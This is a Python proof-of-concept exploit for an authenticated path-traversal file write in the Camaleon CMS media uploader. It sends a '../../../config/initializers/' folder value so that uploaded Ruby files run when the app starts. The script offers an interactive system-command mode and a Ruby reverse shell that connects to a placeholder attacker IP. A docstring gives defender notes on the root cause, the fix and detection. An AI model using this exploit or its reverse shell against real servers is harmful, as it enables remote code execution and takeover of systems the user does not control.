"""Proof-of-concept client for an authenticated arbitrary file write in the
Camaleon CMS media uploader.

What the request does
    A multipart POST is sent to ``/admin/media/upload?actions=false`` with an
    admin's ``auth_token`` and ``_cms_session`` cookies. The ``folder`` form
    field carries ``../../../config/initializers/``, so a server that joins
    this value onto its media root without canonicalising it stores the
    uploaded ``.rb`` file outside the media directory. ``config/initializers``
    is the directory a Rails application loads at boot, so a file written
    there runs with the application's privileges the next time the app starts.

Notes for defenders
    * Root cause is server-side: the upload handler trusts ``folder`` and
      accepts a Ruby script. The fix is to resolve the destination path and
      reject anything outside the media root, plus an extension allow-list.
      Affected and fixed versions are not stated on this page.
    * Detection: upload requests whose ``folder`` part contains ``..``;
      unexpected files (this script uses ``command_exec.rb`` and
      ``reverse_shell.rb``) under ``config/initializers/``; the application
      process spawning shells or opening outbound TCP connections.
    * An HTTP 200 only shows that the upload was accepted. The success
      messages printed below do not confirm that the uploaded code has run.
    * ``verify=False`` turns off TLS certificate validation, so the session
      cookies are sent without checking who is on the other end.
"""
import requests


def exploit_camaleon(auth_token, session_token, target_url, payload_type):
    """Upload a Ruby file through the media endpoint using a traversal path.

    Args:
        auth_token: Value sent as the ``auth_token`` cookie.
        session_token: Value sent as the ``_cms_session`` cookie.
        target_url: Base URL; ``/admin/media/upload?actions=false`` is appended.
        payload_type: ``"command_execution"`` starts an interactive loop that
            uploads one file per entered command; ``"reverse_shell"`` uploads
            a single file. Any other value sends nothing.

    Returns:
        None. Results are reported with ``print``.
    """
    # The multipart body is assembled by hand, so the boundary in the
    # Content-Type header and the "--"-prefixed delimiters must agree.
    boundary = '----WebKitFormBoundary80dMC9jX3srWAsga'
    delimiter = f'--{boundary}'

    request_headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': f'multipart/form-data; boundary={boundary}',
        'Accept': '*/*',
        'Connection': 'keep-alive',
    }

    # Both cookies belong to an already authenticated admin session.
    session_cookies = {
        'auth_token': auth_token,
        '_cms_session': session_token,
    }

    def build_body(file_name, payload):
        """Return the three-part form: file_upload, folder, skip_auto_crop."""
        parts = [
            f'{delimiter}\r\n',
            f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n',
            'Content-Type: text/x-ruby-script\r\n\r\n',
            f'{payload}\r\n',
            f'{delimiter}\r\n',
            'Content-Disposition: form-data; name="folder"\r\n\r\n',
            # The traversal: this is the field a patched server must reject.
            '../../../config/initializers/\r\n',
            f'{delimiter}\r\n',
            'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n',
            'true\r\n',
            f'{delimiter}--\r\n',
        ]
        return ''.join(parts)

    def send_upload(body):
        """POST the hand-built body to the media upload endpoint."""
        return requests.post(
            f"{target_url}/admin/media/upload?actions=false",
            headers=request_headers,
            cookies=session_cookies,
            data=body,
            verify=False,  # TLS certificate validation is disabled here
        )

    if payload_type == "reverse_shell":
        # Ruby payload; 'your_ip' and your_port are placeholders left as on the page.
        shell_script = (
            'require \'socket\'\r\n'
            's = TCPSocket.open(\'your_ip\', your_port)\r\n'
            'while (cmd = s.gets)\r\n'
            ' IO.popen(cmd, \'r\') do |io|\r\n'
            ' s.print io.read\r\n'
            ' end\r\n'
            'end\r\n'
        )
        reply = send_upload(build_body('reverse_shell.rb', shell_script))

        # 200 means the server accepted the upload, nothing more.
        if reply.status_code == 200:
            print("Exploit executed successfully with reverse shell!")
        else:
            print(f"Failed with status code: {reply.status_code}")
            # NOTE(review): the page's collapsed layout does not show whether
            # this print sits inside the else; it is kept with the failure path.
            print("Response: ", reply.text)
        return

    if payload_type != "command_execution":
        # Unrecognised payload types fall through without any request.
        return

    while True:
        command = input("Enter a system command to execute (or type 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting command execution mode.")
            break

        # The entered text is interpolated into the Ruby source unescaped.
        ruby_script = (
            'puts "==============================="\r\n'
            'puts "= EXECUTING SYSTEM COMMANDS ="\r\n'
            'puts "==============================="\r\n'
            f'system("{command}")\r\n'
            'puts "==============================="\r\n'
        )
        reply = send_upload(build_body('command_exec.rb', ruby_script))

        # The response body is printed on both paths for debugging.
        if reply.status_code == 200:
            outcome = f"Command '{command}' executed successfully!"
        else:
            outcome = f"Failed to execute '{command}' with status code: {reply.status_code}"
        print(outcome)
        print("Response: ", reply.text)


if __name__ == "__main__":
    # Placeholder values: session cookies and base URL are filled in by hand.
    auth_token = "your_auth_token_here"
    session_token = "your_session_token_here"
    target_url = "https://target_site_here"

    # Accepted values: "reverse_shell" or "command_execution".
    payload_type = input("Enter payload type ('reverse_shell' or 'command_execution'): ").strip()

    exploit_camaleon(auth_token, session_token, target_url, payload_type)